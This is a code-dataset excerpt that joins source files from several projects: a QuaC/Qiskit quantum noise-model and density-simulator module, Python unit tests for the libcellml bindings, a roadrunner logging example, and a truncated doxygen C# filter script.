range(n_qubits)] t2_times = [float('inf') for _ in range(n_qubits)] meas_matrices = None zz = None # Adjust defaults as appropriate if kwargs.get("t1"): t1_times = [backend.properties().t1(qubit) * 1e9 for qubit in qubits] if kwargs.get("t2"): t2_times = [backend.properties().t2(qubit) * 1e9 for qubit in qubits] if kwargs.get("meas"): meas_matrices = [] # Construct probability matrix for measurement error adjustments for qubit in range(n_qubits): # Not all backends have measurement errors added try: prob_meas0_prep1 = backend.properties().qubit_property(qubit, "prob_meas0_prep1")[0] prob_meas1_prep0 = backend.properties().qubit_property(qubit, "prob_meas1_prep0")[0] except BackendPropertyError: warnings.warn("Measurement error simulation not supported on this backend") break qubit_measurement_error_matrix = np.array([ [1 - prob_meas1_prep0, prob_meas0_prep1], [prob_meas1_prep0, 1 - prob_meas0_prep1] ]) meas_matrices.append(qubit_measurement_error_matrix) if kwargs.get("zz"): warnings.warn("ZZ coupling not supported in automatic loading") return QuacNoiseModel(t1_times, t2_times, meas_matrices, zz) @classmethod def from_calibration_results(cls, backend: BaseBackend, t1_result: Tuple[np.array, Result], t2_result: Tuple[np.array, Result], meas_result: Result, zz_results: Dict[Tuple[int, int], Tuple[np.array, float, Result]]): """Takes results from running calibration circuits on hardware and constructs a QuacNoiseModel object :param backend: the backend on which the circuits were run (a BaseBackend object) :param t1_result: a tuple with a list of delay times (in ns) as the 0th element and the T1 calibration Result object as the 1st element :param t2_result: a tuple with a list of delay times (in ns) as the 0th element and the T2 calibration Result object as the 1st element :param meas_result: a Result object from running measurement calibration circuits :param zz_results: a dictionary mapping tuples of qubit indices to a ZZ coupling calibration circuit Result object :return: a QuacNoiseModel object """ n_qubits = len(backend.properties().qubits) qubits = list(range(n_qubits)) # Set up defaults t1_times = [float('inf') for _ in range(n_qubits)] t2_times = [float('inf') for _ in range(n_qubits)] meas_matrices = None zz = None # Adjust defaults as appropriate if t1_result: t1_fit = T1Fitter(t1_result[1], t1_result[0], qubits, fit_p0=[1, 1e5, 0], fit_bounds=([0, 0, -1], [2, 1e10, 1]), time_unit="nano-seconds") t1_times = t1_fit.time() if t2_result: t2_fit = T2Fitter(t2_result[1], t2_result[0], qubits, fit_p0=[1, 1e4, 0], fit_bounds=([0, 0, -1], [2, 1e10, 1]), time_unit="nano-seconds") t2_times = t2_fit.time() if meas_result: meas_fit = TensoredMeasFitter(meas_result, [[qubit] for qubit in qubits]) meas_matrices = meas_fit.cal_matrices if zz_results: zz = {} for qubit1 in qubits: for qubit2 in qubits: if qubit1 < qubit2: zz_information = zz_results[(qubit1, qubit2)] xdata, osc_freq, zz_result = zz_information zz_fit = ZZFitter(zz_result, xdata, [qubit1], [qubit2], fit_p0=[1, osc_freq, -np.pi / 20, 0], fit_bounds=([-0.5, 0, -np.pi, -0.5], [1.5, 1e10, np.pi, 1.5]), ) zz[(qubit1, qubit2)] = zz_fit.ZZ_rate()[0] return QuacNoiseModel(t1_times, t2_times, meas_matrices, zz) @classmethod def from_array(cls, array: np.array, n_qubits: int): """Convert an array to a QuacNoiseModel. Array must contain T1 and T2 times at a minimum :param array: a Numpy array :param n_qubits: the number of qubits simulated :return: a QuacNoiseModel object """ list_array = list(100000 * array) # T1 and T2 times t1_times = list_array[:n_qubits] t2_times = list_array[n_qubits:2 * n_qubits] if len(array) == 2 * n_qubits: return QuacNoiseModel(t1_times, t2_times, None, None) # Measurement error meas_diagonals = list_array[2 * n_qubits:4 * n_qubits] meas_matrices = [] for qubit in range(n_qubits): diagonal = meas_diagonals[2 * qubit:2 * qubit + 2] meas_matrices.append(np.array([ [diagonal[0], 1 - diagonal[1]], [1 - diagonal[0], diagonal[1]] ])) if len(array) == 4 * n_qubits: return QuacNoiseModel(t1_times, t2_times, meas_matrices, None) # ZZ coupling error zz_compressed = list_array[4 * n_qubits:] zz = {} zz_ind = 0 for qubit1 in range(n_qubits): for qubit2 in range(n_qubits): if qubit1 < qubit2: zz[(qubit1, qubit2)] = zz_compressed[zz_ind] zz_ind += 1 return QuacNoiseModel(t1_times, t2_times, meas_matrices, zz) def to_array(self) -> np.array: """Converts a QuacNoiseModel object to an array. Especially useful for optimization :return: a Numpy array """ n_qubits = len(self._t1_times) # Add T1 and T2 floats list_form = self._t1_times + self._t2_times # Add diagonal elements of 2x2 measurement matrices in qubit order if self.has_meas(): for meas_matrix in self._meas_matrices: list_form += list(meas_matrix.diagonal()) if self.has_zz(): # Add zz coupling in order (0, 1), (0, 2) ... for qubit1 in range(n_qubits): for qubit2 in range(n_qubits): if qubit1 < qubit2: list_form.append(self._zz[(qubit1, qubit2)]) return np.array(list_form) / 100000 def build_full_measurement_matrices(self): """Uses Kronecker product on 2x2 measurement matrices to compose a list of matrices that, when all applied to a QuaC bitstring probability vector, result in a new bitstring probability vector adjusted for measurement noise """ n_qubits = len(self._t1_times) full_meas_matrices = [] if self._meas_matrices is None: return [sparse.eye(n_qubits) for _ in range(n_qubits)] for qubit in range(n_qubits): expanded_qubit_meas_mat = sparse.csr_matrix(np.array([1])) for ind in range(n_qubits): if qubit == ind: expanded_qubit_meas_mat = sparse.kron(expanded_qubit_meas_mat, self._meas_matrices[qubit], format='csr') else: expanded_qubit_meas_mat = sparse.kron(expanded_qubit_meas_mat, sparse.eye(2), format='csr') full_meas_matrices.append(expanded_qubit_meas_mat) self._full_meas_matrices = full_meas_matrices ``` #### File: quac_qiskit/models/quac_gates.py ```python from qiskit.quantum_info import Operator class SpecialQuacGates: """Contains special gates supported in QuaC""" @staticmethod def get_gate_unitary(name: str) -> Operator: """Returns a Qiskit operator for various types of QuaC-supported (but not Qiskit-supported) gates that can be used to construct and add a unitary representing said gate to a Qiskit circuit. :param name: the name of the special QuaC-supported gate (czx, cmz, or cxz) :return: an operator corresponding to the gate name provided. If the name is unrecognized, a 4x4 identity operator will be returned """ if name.lower() == "czx": return Operator([ [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, -1], [0, 0, 1, 0] ]) elif name.lower() == "cmz": return Operator([ [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1] ]) elif name.lower() == "cxz": return Operator([ [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 1], [0, 0, -1, 0] ]) return Operator([ [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1] ]) ``` #### File: quac_qiskit/optimization/objective.py ```python from typing import List import numpy as np from qiskit import QuantumCircuit, execute from qiskit.result import Result from quac_qiskit.stat import kl_dist_smoothing, discrete_one_samp_ks, get_vec_angle from quac_qiskit.format import counts_to_list from quac_qiskit.models import QuacNoiseModel def kl_div_sum(circuits: List[QuantumCircuit], simulation_result: Result, reference_result: Result) -> float: """Given a set of test circuits and a Qiskit Result object for a simulation and hardware, the sum of K-L divergence between circuit result distributions for each circuit is computed :param circuits: a list of QuantumCircuit objects :param simulation_result: a Qiskit Result object :param reference_result: a Qiskit Result object :return: a float representing the total K-L divergence between distributions of all circuits """ total_kl_div = 0 for circuit in circuits: simulation_counts = np.array(counts_to_list(simulation_result.get_counts(circuit))) simulation_dist = simulation_counts / simulation_counts.sum() # normalize if using counts simulator reference_counts = np.array(counts_to_list(reference_result.get_counts(circuit))) reference_dist = reference_counts / reference_counts.sum() # normalize if using counts simulator total_kl_div += kl_dist_smoothing(reference_dist, simulation_dist, 1e-5) return total_kl_div def ks_div_sum(circuits: List[QuantumCircuit], simulation_result: Result, reference_result: Result) -> float: """Given a set of test circuits and a Qiskit Result object for a simulation and hardware, the sum of K-S distance between circuit result distributions for each circuit is computed :param circuits: a list of QuantumCircuit objects :param simulation_result: a Qiskit Result object :param reference_result: a Qiskit Result object :return: a float representing the total K-S distance between distributions of all circuits """ total_ks_div = 0 for circuit in circuits: simulation_counts = np.array(counts_to_list(simulation_result.get_counts(circuit))) simulation_dist = simulation_counts / simulation_counts.sum() # normalize if using counts simulator reference_counts = np.array(counts_to_list(reference_result.get_counts(circuit))) reference_dist = reference_counts / reference_counts.sum() # normalize if using counts simulator total_ks_div += discrete_one_samp_ks(reference_dist, simulation_dist, 8000)[0] return total_ks_div def angle_div_sum(circuits: List[QuantumCircuit], simulation_result: Result, reference_result: Result) -> float: """Given a set of test circuits and a Qiskit Result object for a simulation and hardware, the sum of angle distance between circuit result distributions for each circuit is computed :param circuits: a list of QuantumCircuit objects :param simulation_result: a Qiskit Result object :param reference_result: a Qiskit Result object :return: a float representing the total angle distance between distributions of all circuits """ total_angle_div = 0 for ind, circuit in enumerate(circuits): simulation_counts = np.array(counts_to_list(simulation_result.get_counts(circuit))) simulation_dist = simulation_counts / simulation_counts.sum() # normalize if using counts simulator reference_counts = np.array(counts_to_list(reference_result.get_counts(circuit))) reference_dist = reference_counts / reference_counts.sum() # normalize if using counts simulator total_angle_div += get_vec_angle(reference_dist, simulation_dist) return total_angle_div def kl_objective_function(noise_model_array: np.array, *args): """An objective function to be minimized based on K-L divergence :param noise_model_array: a Numpy array generated via QuacNoiseModel.to_array() :param args: QuantumCircuit objects run, the simulator to run on, and the hardware results :return: a float representing the "loss" over the set of circuits """ circuits, backend, reference_result = args noise_model = QuacNoiseModel.from_array(noise_model_array, backend.configuration().n_qubits) simulation_result = execute(circuits, backend, shots=1, quac_noise_model=noise_model).result() return kl_div_sum(circuits, simulation_result, reference_result) def ks_objective_function(noise_model_array: np.array, *args): """An objective function to be minimized based on K-S distance :param noise_model_array: a Numpy array generated via QuacNoiseModel.to_array() :param args: QuantumCircuit objects run, the simulator to run on, and the hardware results :return: a float representing the "loss" over the set of circuits """ circuits, backend, reference_result = args noise_model = QuacNoiseModel.from_array(noise_model_array, backend.configuration().n_qubits) simulation_result = execute(circuits, backend, shots=1, quac_noise_model=noise_model).result() return ks_div_sum(circuits, simulation_result, reference_result) def angle_objective_function(noise_model_array: np.array, *args): """An objective function to be minimized based on angle divergence :param noise_model_array: a Numpy array generated via QuacNoiseModel.to_array() :param args: QuantumCircuit objects run, the simulator to run on, and the hardware results :return: a float representing the "loss" over the set of circuits """ circuits, backend, reference_result = args noise_model = QuacNoiseModel.from_array(noise_model_array, backend.configuration().n_qubits) simulation_result = execute(circuits, backend, shots=1, quac_noise_model=noise_model).result() return angle_div_sum(circuits, simulation_result, reference_result) ``` #### File: quac_qiskit/simulators/quac_density_simulator.py ```python import time import numpy as np from scipy import sparse from collections import defaultdict from qiskit.result import Result from qiskit.qobj.qasm_qobj import QasmQobj from qiskit.providers.models.backendproperties import BackendProperties from quac_qiskit.simulators import QuacSimulator class QuacDensitySimulator(QuacSimulator): """Class for simulating a Qiskit-defined quantum experiment and computing the diagonal of its density matrix """ def name(self) -> str: """Returns a name for identifying this specific density backend :return: a string used to identify this backend """ return self.configuration().backend_name + "_density_simulator" def properties(self) -> BackendProperties: """Returns backend properties that reflect the limitations of the hardware if it is specified or the QuaC simulator if not :return: a Qiskit BackendProperties object """ return self._properties def _run_job(self, job_id: str, qobj: QasmQobj, **run_config) -> Result: """Specifies how to run a quantum object job on this backend. This is the method that changes between types of QuaC backends. :param job_id: a uuid4 string to uniquely identify this job :param qobj: an assembled quantum object of experiments :param run_config: injected parameters :return: a Qiskit Result object """ qobj_start = time.perf_counter() results = list() # Update noise model if injected job_noise_model = self._quac_noise_model if run_config.get("quac_noise_model"): job_noise_model = run_config.get("quac_noise_model") for experiment in qobj.experiments: exp_start = time.perf_counter() final_quac_instance, qubit_measurements = super()._run_experiment(experiment, **run_config) # Create a frequency defaultdict for multinomial experiment tallying frequencies = defaultdict(lambda: 0) # Get probabilities of all states occurring and try to adjust them by measurement errors bitstring_probs = sparse.csr_matrix(final_quac_instance.get_bitstring_probs()).transpose() if job_noise_model.has_meas(): # If measurement error simulation is turned on, adjust probabilities accordingly for expanded_qubit_meas_mat in job_noise_model.meas(): bitstring_probs = np.dot(expanded_qubit_meas_mat, bitstring_probs) # Switch probability list least significant bit convention and add to dictionary for decimal_state in range(bitstring_probs.shape[0]): binary_state = bin(decimal_state)[2:] state_prob = bitstring_probs.toarray()[decimal_state][0] padded_outcome_state = list(binary_state.zfill(qobj.config.n_qubits)) classical_register = ["0"] * qobj.config.memory_slots for qubit, outcome in enumerate(padded_outcome_state): # Only measure specified qubits into the classical register if qubit in qubit_measurements: for register_slot in qubit_measurements[qubit]: classical_register[register_slot] = outcome classical_register.reverse() # convert to Qiskit MSB format classical_register_hex = hex(int(''.join(classical_register), 2)) frequencies[classical_register_hex] += state_prob results.append({ "name": experiment.header.name, "shots": qobj.config.shots, "data": {"counts": dict(frequencies)}, "status": "DONE", "success": True, "time_taken": time.perf_counter() - exp_start, "header": experiment.header.to_dict() }) job_result = { "backend_name": self.name(), "backend_version": self.configuration().backend_version, "qobj_id": qobj.qobj_id, "job_id": job_id, "results": results, "success": True, "time_taken": time.perf_counter() - qobj_start, "header": qobj.header.to_dict() } return Result.from_dict(job_result) ``` #### File: quac_qiskit/stat/util.py ```python from typing import List, Union import random import numpy as np def choose_index(prob_dist: Union[List[float], np.array]) -> int: """Chooses an index i from a list l with probability l[i] :param prob_dist: a list of floating point probabilities :type prob_dist: List[float] :return: an integer representing the chosen index """ chooser = random.random() upper_limit = 0 lower_limit = 0 for i, prob in enumerate(prob_dist): upper_limit += prob if lower_limit <= chooser < upper_limit: return i lower_limit += prob # return -1 # TODO: update when bitstring bug is fixed return 0 ```
{ "source": "0u812/libcellml", "score": 3 }
#### File: bindings/python/test_component.py ```python import unittest class ComponentTestCase(unittest.TestCase): def test_create_destroy(self): from libcellml import Component # Test create/copy/destroy x = Component() del(x) y = Component() z = Component(y) del(y, z) def test_inheritance(self): import libcellml from libcellml import Component x = Component() self.assertIsInstance(x, libcellml.ComponentEntity) self.assertIsInstance(x, libcellml.ImportedEntity) self.assertIsInstance(x, libcellml.NamedEntity) self.assertIsInstance(x, libcellml.Entity) def test_inherited_methods(self): from libcellml import Component x = Component() idx = 'test' self.assertEqual(x.id(), '') x.setId(idx) self.assertEqual(x.id(), idx) y = Component(x) self.assertEqual(y.id(), idx) def test_set_source(self): from libcellml import Component, ImportSource x = Component() i = ImportSource() i.setUrl('bonjour') x.setSourceComponent(i, 'camembert') self.assertEqual(x.importSource().url(), 'bonjour') self.assertEqual(x.importReference(), 'camembert') def test_math(self): from libcellml import Component # appendMath(const std::string &math) x = Component() x.appendMath('More maths') x.appendMath(' please!') # std::string math() self.assertEqual(x.math(), 'More maths please!') x = Component() self.assertEqual(x.math(), '') # void setMath(const std::string &math) x.setMath('bonjour') self.assertEqual(x.math(), 'bonjour') x.setMath('hola') self.assertEqual(x.math(), 'hola') def test_add_variable(self): from libcellml import Component, Variable c = Component() v = Variable() c.addVariable(v) def test_has_variable(self): from libcellml import Component, Variable # bool hasVariable(const VariablePtr &variable) c = Component() v = Variable() self.assertFalse(c.hasVariable(v)) c.addVariable(v) self.assertTrue(c.hasVariable(v)) self.assertFalse(c.hasVariable(Variable())) del(c, v) # bool hasVariable(const std::string &name) c = Component() self.assertFalse(c.hasVariable('')) v1 = Variable() c.addVariable(v1) self.assertFalse(c.hasVariable('blue')) self.assertTrue(c.hasVariable('')) name = 'yellow' v2 = Variable() v2.setName(name) c.addVariable(v2) self.assertTrue(c.hasVariable(name)) del(c, v1, v2, name) def test_remove_variable(self): from libcellml import Component, Variable # bool removeVariable(size_t index) c = Component() self.assertFalse(c.removeVariable(0)) self.assertFalse(c.removeVariable(-1)) self.assertFalse(c.removeVariable(1)) c.addVariable(Variable()) self.assertFalse(c.removeVariable(-1)) self.assertFalse(c.removeVariable(1)) self.assertTrue(c.removeVariable(0)) self.assertFalse(c.removeVariable(0)) del(c) # bool removeVariable(const std::string &name) c = Component() self.assertFalse(c.removeVariable('')) v1 = Variable() c.addVariable(v1) self.assertTrue(c.removeVariable('')) self.assertFalse(c.removeVariable('')) name = 'blue' v1.setName(name) self.assertFalse(c.removeVariable(name)) c.addVariable(v1) self.assertTrue(c.removeVariable(name)) self.assertFalse(c.removeVariable(name)) del(c, v1, name) # bool removeVariable(const VariablePtr &variable) c = Component() v1 = Variable() v2 = Variable() self.assertFalse(c.removeVariable(v1)) c.addVariable(v1) self.assertFalse(c.removeVariable(v2)) self.assertTrue(c.removeVariable(v1)) self.assertFalse(c.removeVariable(v1)) def test_remove_all_variables(self): from libcellml import Component, Variable # void removeAllVariables() c = Component() v1 = Variable() v2 = Variable() c.addVariable(v1) c.addVariable(v2) self.assertTrue(c.hasVariable(v1)) self.assertTrue(c.hasVariable(v2)) c.removeAllVariables() self.assertFalse(c.hasVariable(v1)) self.assertFalse(c.hasVariable(v2)) def test_variable(self): from libcellml import Component, Variable # VariablePtr variable(size_t index) c = Component() v = Variable() name = 'green' v.setName(name) self.assertIsNone(c.variable(0)) self.assertIsNone(c.variable(1)) self.assertIsNone(c.variable(-1)) c.addVariable(v) self.assertIsNone(c.variable(1)) self.assertIsNone(c.variable(-1)) self.assertIsNotNone(c.variable(0)) self.assertEqual(c.variable(0).name(), name) del(c, v, name) # VariablePtr variable(const std::string &name) c = Component() v = Variable() name = 'green' v.setName(name) self.assertIsNone(c.variable(name)) c.addVariable(v) self.assertIsNone(c.variable('red')) self.assertIsNotNone(c.variable(name)) self.assertEqual(c.variable(name).name(), name) def test_variable_count(self): from libcellml import Component, Variable # size_t variableCount() c = Component() self.assertEqual(c.variableCount(), 0) c.addVariable(Variable()) self.assertEqual(c.variableCount(), 1) c.addVariable(Variable()) self.assertEqual(c.variableCount(), 2) c.removeVariable('') self.assertEqual(c.variableCount(), 1) c.removeVariable('') self.assertEqual(c.variableCount(), 0) if __name__ == '__main__': unittest.main() ``` #### File: bindings/python/test_imported_entity.py ```python import unittest class ImportedEntityTestCase(unittest.TestCase): def test_create_destroy(self): from libcellml import ImportedEntity x = ImportedEntity() y = ImportedEntity() z = ImportedEntity(y) del(x, y, z) def test_set_import_source(self): from libcellml import ImportedEntity, ImportSource # void setImportSource(const ImportPtr &imp) x = ImportedEntity() x.setImportSource(ImportSource()) x.setImportSource(None) def test_is_import(self): from libcellml import ImportedEntity, ImportSource # bool isImport() x = ImportedEntity() self.assertFalse(x.isImport()) x.setImportSource(ImportSource()) self.assertTrue(x.isImport()) x.setImportSource(None) self.assertFalse(x.isImport()) def test_import_source(self): from libcellml import ImportedEntity, ImportSource # ImportSourcePtr importSource() i = ImportSource() source = 'hello' i.setUrl(source) x = ImportedEntity() self.assertIsNone(x.importSource()) x.setImportSource(i) self.assertIsNotNone(x.importSource()) self.assertEqual(x.importSource().url(), source) def test_set_import_reference(self): from libcellml import ImportedEntity # void setImportReference(const std::string &reference) r = 'yes' x = ImportedEntity() x.setImportReference('') x.setImportReference(r) x.setImportReference('') def test_import_reference(self): from libcellml import ImportedEntity # std::string importReference() r = 'yes' x = ImportedEntity() self.assertEqual(x.importReference(), '') x.setImportReference(r) self.assertEqual(x.importReference(), r) x.setImportReference('') self.assertEqual(x.importReference(), '') if __name__ == '__main__': unittest.main() ``` #### File: bindings/python/test_import_source.py ```python import unittest class ImportSourceTestCase(unittest.TestCase): def test_import_source(self): from libcellml import ImportSource # Test create/copy/destroy x = ImportSource() y = ImportSource() z = ImportSource(y) del(x, y, z) def test_inheritance(self): import libcellml from libcellml import ImportSource x = ImportSource() self.assertIsInstance(x, libcellml.Entity) def test_set_url(self): from libcellml import ImportSource # void setUrl(const std::string &reference) x = ImportSource() x.setUrl('') x.setUrl('hello') x.setUrl('') def test_url(self): from libcellml import ImportSource # std::string url() source = 'cheers' x = ImportSource() self.assertEqual(x.url(), '') x.setUrl(source) self.assertEqual(x.url(), source) x.setUrl('') self.assertEqual(x.url(), '') def test_set_model(self): from libcellml import ImportSource, Model # void setModel(const ModelPtr &model); x = ImportSource() x.setModel(None) x.setModel(Model()) x.setModel(None) def test_model(self): from libcellml import ImportSource, Model # ModelPtr model() const; model = Model() model.setName('bert') x = ImportSource() self.assertIsNone(x.model()) x.setModel(model) self.assertEqual(x.model().name(), model.name()) x.setModel(None) self.assertIsNone(x.model()) def test_has_model(self): from libcellml import ImportSource, Model # bool hasModel() const; x = ImportSource() self.assertFalse(x.hasModel()) x.setModel(Model()) self.assertTrue(x.hasModel()) x.setModel(None) self.assertFalse(x.hasModel()) if __name__ == '__main__': unittest.main() ``` #### File: bindings/python/test_logger.py ```python import unittest class LoggerTestCase(unittest.TestCase): def test_create_destroy(self): from libcellml import Logger # Test create/copy/destroy x = Logger() del(x) y = Logger() z = Logger(y) del(y, z) def test_add_error(self): from libcellml import Logger, Error # void addError(const ErrorPtr error) x = Logger() x.addError(Error()) def test_error_count(self): from libcellml import Logger, Error # size_t errorCount() x = Logger() self.assertEqual(x.errorCount(), 0) x.addError(Error()) self.assertEqual(x.errorCount(), 1) x.addError(Error()) self.assertEqual(x.errorCount(), 2) def test_error(self): from libcellml import Logger, Error # ErrorPtr error(size_t index) x = Logger() self.assertIsNone(x.error(0)) self.assertIsNone(x.error(1)) self.assertIsNone(x.error(-1)) e = Error() e.setKind(Error.Kind.MODEL) x.addError(e) self.assertIsNotNone(x.error(0)) self.assertIsNone(x.error(1)) self.assertEqual(x.error(0).kind(), Error.Kind.MODEL) def test_clear_errors(self): from libcellml import Logger, Error # void clearErrors() x = Logger() self.assertEqual(x.errorCount(), 0) x.addError(Error()) x.addError(Error()) self.assertEqual(x.errorCount(), 2) x.clearErrors() self.assertEqual(x.errorCount(), 0) if __name__ == '__main__': unittest.main() ``` #### File: bindings/python/test_model.py ```python import unittest class ModelTestCase(unittest.TestCase): def test_create_destroy(self): from libcellml import Model x = Model() del(x) y = Model() z = Model(y) del(y, z) def test_inheritance(self): import libcellml from libcellml import Model x = Model() self.assertIsInstance(x, libcellml.ComponentEntity) self.assertIsInstance(x, libcellml.NamedEntity) self.assertIsInstance(x, libcellml.Entity) # Test access to inherited methods x = Model() idx = 'test' self.assertEqual(x.id(), '') x.setId(idx) self.assertEqual(x.id(), idx) y = Model(x) self.assertEqual(y.id(), idx) def test_add_units(self): from libcellml import Model, Units # void addUnits(const UnitsPtr &units) m = Model() u = Units() m.addUnits(u) def test_remove_units(self): from libcellml import Model, Units # bool removeUnits(size_t index) m = Model() u = Units() self.assertFalse(m.removeUnits(0)) self.assertFalse(m.removeUnits(1)) self.assertFalse(m.removeUnits(-1)) m.addUnits(u) self.assertFalse(m.removeUnits(1)) self.assertFalse(m.removeUnits(-1)) self.assertTrue(m.removeUnits(0)) self.assertFalse(m.removeUnits(0)) del(m, u) # bool removeUnits(const std::string &name) name = 'bert' m = Model() u = Units() u.setName(name) self.assertFalse(m.removeUnits(name)) m.addUnits(u) self.assertFalse(m.removeUnits('ernie')) self.assertTrue(m.removeUnits(name)) del(m, u, name) # bool removeUnits(const UnitsPtr &units) m = Model() u1 = Units() u2 = Units() self.assertFalse(m.removeUnits(u1)) m.addUnits(u1) self.assertFalse(m.removeUnits(u2)) self.assertTrue(m.removeUnits(u1)) self.assertFalse(m.removeUnits(u1)) del(m, u1, u2) def test_remove_all_units(self): from libcellml import Model, Units # void removeAllUnits() m = Model() u1 = Units() u2 = Units() m.addUnits(u1) m.addUnits(u2) m.removeAllUnits() self.assertFalse(m.removeUnits(u1)) self.assertFalse(m.removeUnits(u2)) del(m, u1, u2) def test_has_units(self): from libcellml import Model, Units # bool hasUnits(const std::string &name) name = 'loud' m = Model() u = Units() u.setName(name) m.addUnits(u) self.assertFalse(m.hasUnits('hi')) self.assertTrue(m.hasUnits(name)) # bool hasUnits(const UnitsPtr &units) self.assertTrue(m.hasUnits(u)) v = Units() self.assertFalse(m.hasUnits(v)) def test_units(self): from libcellml import Model, Units # UnitsPtr units(size_t index) name = 'naaame' m = Model() u = Units() u.setName(name) self.assertIsNone(m.units(0)) self.assertIsNone(m.units(1)) self.assertIsNone(m.units(-1)) m.addUnits(u) self.assertIsNone(m.units(1)) self.assertIsNone(m.units(-1)) self.assertIsNotNone(m.units(0)) self.assertEqual(m.units(0).name(), name) del(m, u, name) # UnitsPtr units(const std::string &name) name = 'kermit' m = Model() u = Units() u.setName(name) self.assertIsNone(m.units(name)) m.addUnits(u) self.assertIsNotNone(m.units(name)) self.assertEqual(m.units(name).name(), name) del(m, u, name) def test_take_units(self): from libcellml import Model, Units # UnitsPtr takeUnits(size_t index) name = 'piggy' m = Model() u = Units() u.setName(name) self.assertIsNone(m.takeUnits(0)) self.assertIsNone(m.takeUnits(-1)) self.assertIsNone(m.takeUnits(1)) m.addUnits(u) self.assertIsNone(m.takeUnits(-1)) self.assertIsNone(m.takeUnits(1)) self.assertIsNotNone(m.takeUnits(0)) self.assertIsNone(m.takeUnits(0)) m.addUnits(Units()) m.addUnits(u) self.assertEqual(m.takeUnits(1).name(), name) del(m, u) # UnitsPtr takeUnits(const std::string &name) name = 'aloha' m = Model() u = Units() u.setName(name) self.assertIsNone(m.takeUnits(name)) m.addUnits(u) self.assertEquals(m.takeUnits(name).name(), name) self.assertIsNone(m.takeUnits(name)) del(m, u, name) def test_replace_units(self): from libcellml import Model, Units # bool replaceUnits(size_t index, const UnitsPtr &units) m = Model() u1 = Units() u1.setName('a') m.addUnits(u1) u2 = Units() u2.setName('b') self.assertTrue(m.replaceUnits(0, u2)) self.assertFalse(m.replaceUnits(1, u1)) self.assertFalse(m.replaceUnits(-1, u1)) self.assertEqual(m.units(0).name(), 'b') del(m, u1, u2) # bool replaceUnits(const std::string &name, const UnitsPtr &units) m = Model() a = Units() a.setName('a') m.addUnits(a) b = Units() b.setName('b') self.assertFalse(m.replaceUnits('b', a)) self.assertTrue(m.replaceUnits('a', b)) self.assertTrue(m.replaceUnits('b', a)) self.assertFalse(m.replaceUnits('b', a)) del(m, a, b) # bool replaceUnits(const UnitsPtr &oldUnits, const UnitsPtr &newUnits) m = Model() a = Units() m.addUnits(a) b = Units() self.assertFalse(m.replaceUnits(b, a)) self.assertTrue(m.replaceUnits(a, b)) self.assertTrue(m.replaceUnits(b, a)) self.assertFalse(m.replaceUnits(b, a)) del(m, a, b) def test_units_count(self): from libcellml import Model, Units # size_t unitsCount() m = Model() self.assertEqual(m.unitsCount(), 0) m.addUnits(Units()) self.assertEqual(m.unitsCount(), 1) m.addUnits(Units()) self.assertEqual(m.unitsCount(), 2) m.removeAllUnits() self.assertEqual(m.unitsCount(), 0) del(m) def test_has_unresolved_imports(self): from libcellml import Model, Component, ImportSource # bool hasUnresolvedImports(); m = Model() self.assertFalse(m.hasUnresolvedImports()) c = Component() m.addComponent(c) self.assertFalse(m.hasUnresolvedImports()) c.setImportSource(ImportSource()) self.assertTrue(m.hasUnresolvedImports()) def test_resolve_imports(self): from libcellml import Model m = Model() m.resolveImports('file.txt') if __name__ == '__main__': unittest.main() ``` #### File: bindings/python/test_parser.py ```python import unittest class ParserTestCase(unittest.TestCase): def test_create_destroy(self): from libcellml import Parser x = Parser() del(x) y = Parser() z = Parser(y) del(y, z) def test_inheritance(self): import libcellml from libcellml import Parser x = Parser() self.assertIsInstance(x, libcellml.Logger) # Test access to inherited methods self.assertIsNone(x.error(0)) self.assertIsNone(x.error(-1)) self.assertEqual(x.errorCount(), 0) x.addError(libcellml.Error()) self.assertEqual(x.errorCount(), 1) def test_parse_model(self): import libcellml from libcellml import Parser # ModelPtr parseModel(const std::string &input) p = Parser() self.assertIsInstance(p.parseModel('rubbish'), libcellml.Model) if __name__ == '__main__': unittest.main() ``` #### File: bindings/python/test_validator.py ```python import unittest class ValidatorTestCase(unittest.TestCase): def test_create_destroy(self): from libcellml import Validator x = Validator() del(x) y = Validator() z = Validator(y) del(y, z) def test_inheritance(self): import libcellml from libcellml import Validator # Test inheritance x = Validator() self.assertIsInstance(x, libcellml.Logger) # Test access to inherited methods self.assertIsNone(x.error(0)) self.assertIsNone(x.error(-1)) self.assertEqual(x.errorCount(), 0) x.addError(libcellml.Error()) self.assertEqual(x.errorCount(), 1) def test_validate_model(self): import libcellml from libcellml import Validator # void validateModel(const ModelPtr &model) v = Validator() v.validateModel(libcellml.Model()) if __name__ == '__main__': unittest.main() ```
{ "source": "0u812/roadrunner", "score": 2 }
#### File: roadrunner/examples/logging.py ```python import roadrunner as rr rr.Logger.setLevel(rr.Logger.LOG_TRACE) def log(): rr.Logger.log(rr.Logger.LOG_FATAL, "A fatal message") rr.Logger.log(rr.Logger.LOG_CRITICAL, "A critical message") rr.Logger.log(rr.Logger.LOG_ERROR, "An error message") rr.Logger.log(rr.Logger.LOG_WARNING, "A warning message") rr.Logger.log(rr.Logger.LOG_NOTICE, "A notice message") rr.Logger.log(rr.Logger.LOG_INFORMATION, "An informational message") rr.Logger.log(rr.Logger.LOG_DEBUG, "A debugging message.") rr.Logger.log(rr.Logger.LOG_TRACE, "A tracing message. This is the lowest priority.") rr.Logger.log(rr.Logger.LOG_NOTICE, "logging with default colors:") log() rr.Logger.setFormattingPattern("%Y-%m-%d %H:%M:%S %p: %t") log() rr.Logger.setProperty("traceColor", "red") rr.Logger.setProperty("debugColor", "green") rr.Logger.setProperty("informationColor", "blue") rr.Logger.setProperty("noticeColor", "magenta") rr.Logger.setProperty("warningColor", "cyan") rr.Logger.setProperty("errorColor", "gray") rr.Logger.setProperty("criticalColor", "white") rr.Logger.setProperty("fatalColor", "brown") rr.Logger.log(rr.Logger.LOG_NOTICE, "logging with new and better colors:") log() ``` #### File: src/filters/doc-filter-csharp.py ```python import sys, string, os.path, re def filterForDoxygen (istream, ostream): # We read the stream line by line, looking for our marker. The marker is # created by src/bindings/swig/swigdoc.py; it is *not* the same marker as # we use in Doxygen comments, but rather a separate marker used for # communication between swigdoc.py and this (csdocfilter.py) script. pattern = re.compile('(.+?)/\* libsbml-internal \*/(.+?)public(.+?)') for line in istream.readlines(): match = pattern.search(line) if match: ostream.write(pattern.sub(r'\1\2private\3', line)) else: ostream.write(line) def main (args): """Usage: csdocfilter.py file > 